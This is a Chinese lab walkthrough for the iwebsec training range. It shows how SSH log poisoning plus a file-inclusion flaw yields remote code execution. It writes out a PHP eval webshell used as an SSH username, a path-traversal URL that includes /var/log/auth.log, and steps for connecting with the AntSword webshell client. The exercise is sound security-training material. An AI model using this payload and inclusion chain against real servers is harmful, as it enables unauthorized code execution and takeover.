当前位置: 首页 > news >正文

iwebsec靶场 文件包含关卡通关笔记11-ssh日志文件包含

目录

日志包含

1.构造恶意ssh登录命令

2.配置ssh日志开启

(1)配置sshd

(2)配置rsyslog

(3)重启服务

3.写入webshell木马

4.获取php信息渗透

5.蚁剑连接


日志包含

1.构造恶意ssh登录命令

ssh服务如果开启了日志记录功能,那么在进行ssh连接时会将登录的日志记录到ssh日志文件内,这个文件的默认路径是/var/log/auth.log。那么可以通过将连接用户名设置为恶意代码,用命令连接服务器iwebsec的服务器,这样就可以将恶意代码写入到日志文件中。

用户名设置为为如下一句话木马脚本,参数为ljn

"<?php @eval(\$POST[ljn];?>"

2.配置ssh日志开启

(1)配置sshd

文件地址为/etc/ssh/sshd_config

SyslogFacility AUTHPRIV
LogLevel INFO

(2)配置rsyslog

ubuntu系统中文件地址为/etc/rsyslog.conf

# The authpriv file has restricted access.
authpriv.*                                              /var/log/auth.log

(3)重启服务

配置完毕后务必要记住重启服务,否则修改不生效

service sshd restart
service rsyslog restart

重启后效果如下

为了避免之前/var/log/auth.log中内容对渗透造成影响,故而将此文件先清空,如下所示:

3.写入webshell木马

此实验只是为了验证这个漏洞的存在,故而在iwebsec靶场的容器内执行,如下所示通过用户名向日志写入一句话马,参数为ljn,命令如下所示

ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1

执行完整交互如下所示:

[root@bc23a49cb37c /]# ssh "<?php @eval(\$_POST[ljn]);?>"@127.0.0.1
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied, please try again.
<?php @eval($_POST[ljn]);?>@127.0.0.1's password: 
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).

 查看/var/log/auth.log 文件,发现已经将恶意的一句话木马通过登录用户写入到了ssh登录日志中,如下所示

[root@bc23a49cb37c /]# cat /var/log/auth.log 
Nov 28 07:07:07 bc23a49cb37c sshd[852]: Invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1
Nov 28 07:07:07 bc23a49cb37c sshd[853]: input_userauth_request: invalid user <?php @eval($_POST[ljn]);?>
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed none for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[852]: Failed password for invalid user <?php @eval($_POST[ljn]);?> from 127.0.0.1 port 56172 ssh2
Nov 28 07:07:08 bc23a49cb37c sshd[853]: Connection closed by 127.0.0.1

这里如果没有生成日志的话,建议重启一下sshd服务与rsyslog服务再次重试

service rsyslog restart
Shutting down system logger:                               [  OK  ]
Starting system logger:                                    [  OK  ]

4.获取php信息渗透

ssh登录的日志名为/var/log/auth.log

于是构造日志访问路径 filename=../../../../var/log/auth.log

利用文件包含第01关卡进行渗透

http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.loghttp://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log渗透如下所示

5.蚁剑连接

添加url和密码,分别为http://192.168.71.151/fi/01.php?filename=../../../../var/log/auth.log和ljn,如下所示

进入文件管理模块

如上所示,渗透成功

相关文章:

  • Mysql相关知识2:Mysql隔离级别、MVCC、锁
  • 大数定理(LLN)习题集 · 题目篇
  • 深入了解802.11b:无线局域网的重要里程碑
  • QML 状态系统
  • Pycharm 如何删除某个 Python Interpreter
  • Arduino示例代码讲解:Project 07 - Keyboard 键盘
  • FastAPI-MCP
  • C++运算符重载详解
  • Vue3 + TypeScript,使用祖先传后代模式重构父传子模式
  • 【滑动窗口】串联所有单词的⼦串(hard)
  • 多态的主要好处与不足
  • 10.QT-显示类控件|LCD Number|ProgressBar|Calendar Widget(C++)
  • [论文阅读]Making Retrieval-Augmented Language Models Robust to Irrelevant Context
  • 论文阅读:2024 arxiv DeepInception: Hypnotize Large Language Model to Be Jailbreaker
  • Pandas高级功能
  • C++入门篇(下)
  • 【支付】支付宝支付
  • go+mysql+cocos实现游戏搭建
  • centos停服 迁移centos7.3系统到新搭建的openEuler
  • HTMLCSS实现网页轮播图
  • 孙颖莎4比1击败陈幸同,与蒯曼会师澳门世界杯女单决赛
  • 两名中国公民在墨尔本被海浪卷走,我领馆发文提醒
  • 观察|雀巢咖啡加码中国布局,如何借势云南咖啡打造新增长极?
  • 谁在向张福生行贿?
  • 中国足协、中足联:对中超浙江队外援阿隆·布彭扎不幸离世表示深切哀悼
  • 马上评|“阿大葱油饼”回归,上海美食的人间烟火故事